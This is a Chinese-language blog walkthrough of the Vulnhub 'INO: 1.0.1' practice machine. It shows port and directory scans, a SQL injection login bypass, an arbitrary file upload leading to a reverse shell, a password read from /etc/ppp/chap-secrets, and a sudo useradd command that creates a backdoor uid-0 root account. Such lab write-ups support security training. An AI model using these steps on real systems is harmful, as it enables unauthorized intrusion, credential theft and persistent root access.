首页 > 其他分享 >Vulnhub: INO: 1.0.1靶机

Vulnhub: INO: 1.0.1靶机

时间:2023-09-04 16:44:14浏览次数:41  
标签:1.0 admin 111.234 192.168 INO Vulnhub ppp 靶机 root

kali:192.168.111.111

靶机:192.168.111.234

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.234

image

80端口目录爆破

gobuster dir -u http://192.168.111.234/lot -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf

image

漏洞利用

访问admin目录进入后台登录界面,登录处存在万能密码

admin'or 1=1#

image

登录后存在任意文件上传

image

上传后文件位置/lot/admin/assets/uploads/maps/

image

获得反弹shell

image

提权

查看/etc/ppp/chap-secrets,得到ppp用户密码:ESRxd7856HVJB

image

ppp用户sudo权限

image

创建root权限的用户

sudo -u root /usr/sbin/useradd -p `openssl passwd -1 a` a -o -u 0 -g root

image

标签:1.0,admin,111.234,192.168,INO,Vulnhub,ppp,靶机,root
From: https://www.cnblogs.com/ctostm/p/17677498.html

相关文章

  • PDF 补丁丁 1.0 正式版
    经过了一年多的测试和完善,PDF补丁丁发布第一个开放源代码的正式版本了。PDF补丁丁也是国内首先开放源代码、带有修改和阅读PDF的功能的 PDF处理程序之一。源代码网址:https://github.com/wmjordan/PDFPatcher软件简介及下载连接。 新增功能:第一个开放源代码版本。修......
  • 新人笔记-集合1.0
    importjava.util.ArrayList;publicclassDemo01{publicstaticvoidmain(String[]args){//publicArrayList()创建一个空的集合对象//ArrayList<String>a=newArrayList<>();效果和下方相同ArrayList<String>a=newArrayList&l......
  • Vulnhub: Inferno: 1.1靶机
    kali:192.168.111.111靶机:192.168.111.233信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23380端口目录爆破gobusterdir-uhttp://192.168.111.233-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,html......
  • 什么是 JMX?(Trino JMX 实战讲解)
    目录一、概述二、JMX原理三、实战操作(开启TrinoJMX)1)环境部署2)开启TrinoJMX1、配置config.properties2、配置jvm.config3、重新启动服务4、获取监控数据3)通过jconsole连接JMX4)常用的Trino指标接口和指标一、概述JMX是JavaManagementExtensions(Java管理扩展)的缩......
  • Arduino 的几种点灯方式
    延时函数点灯//定义灯管脚constuint8_tblinkPin=LED_BUILTIN;//依靠延时函数来闪烁voidfuncBlink(intsecond){unsignedlongmillisSecond=second*1000;//亮灯digitalWrite(blinkPin,HIGH);delay(millisSecond);//延时熄灯digitalWrite(bl......
  • 无涯教程-JavaScript - NEGBINOMDIST函数
    NEGBINOMDIST函数取代了Excel2010中的NEGBINOM.DIST函数。描述该函数返回负二项式分布。NEGBINOMDIST返回在第number_s次成功之前出现number_f次失败的概率,而成功的恒定概率是概率_s。该函数与二项式分布相似,不同之处在于成功次数是固定的,而试验次数是可变的。像二项式一......
  • Binary Tree Inorder Traversal
    SourceGivenabinarytree,returntheinordertraversalofitsnodes'values.ExampleGivenbinarytree{1,#,2,3},1\2/3return[1,3,2].ChallengeCanyoudoitwithoutrecursion?Note: Recursivesolutionistrivial,cou......
  • Vulnhub: Hogwarts: Bellatrix靶机
    kali:192.168.111.111靶机:192.168.111.228信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.228访问80端口查看源码,提示ikilledsiriusblack.php和文件包含的参数名file漏洞利用ikilledsiriusblack.php存在文件包含http://192.168.111.228/......
  • Vulnhub: Ragnar Lothbrok: 1靶机
    kali:192.168.111.111靶机:192.168.111.226信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.226作者提示修改hosts文件目录爆破gobusterdir-uhttp://armbjorn-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,ba......
  • RISC-V学习1.0
    Membership–RISC-VInternational(riscv.org) RISC-VChina–RISC-VInternational(riscv.org)tommythorn/yarvi:YetAnotherRISC-VImplementation(github.com)alu.v//-----------------------------------------------------------------------////Apur......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99